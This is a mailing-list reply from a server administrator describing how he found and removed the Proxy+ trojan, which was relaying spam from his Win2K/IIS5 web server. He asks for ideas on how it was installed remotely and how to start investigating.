Re: Proxy+ Trojan

["Bill" <proftpd () anatek com>]

Hamish,

Sorry, I should have provided a better desicription to begin.

> The simple answer is find out how it was put on there, and block off that

That's the problem -- it's not so simple.  This is a dedicated web server
(Win2K/IIS5) that I have co-located in a top-tier data center.  The app was
installed remotely, and no logins were compromised.  I had just finished
having my SQL Server harded (about 10 days _before_ Slammer!) and we ran
some extensive password cracking software then.  I was feeling pretty ok,
and then I started getting SpamCop reports.  I checked for an open relay a
hundred times, but couldn't find anything.  After a couple of days I found
the copy of Proxy+ and blew it away.  I then installed a software firewall,
and I'm ok now (except for learning how to configure the firewall :-) ).

The real problem is that I don't know how this install was done.  I would
really like to address this as an independent issue.  I must have something
configured horribly wrong, but how do I start the detective work?  And now,
everything seems suspicious.  I feel the urge to disable every service!  :-)

Anyhow, if you have ideas on how an app could get installed remotely, I
could start investigating.

> Then do a security audit on that machine.

I hae subscribed to the SecurityMetrics offering, which I think will
definitely help on an ongoing basis.  But my situation is not ideal.  I'm
misconfigured, I'm sure, but hadnling it with a firewall.  I want to be
correctly configured and have the firewall as an extra measure of safety.

I would enjoy hearing your speculation!

Thanks!

Bill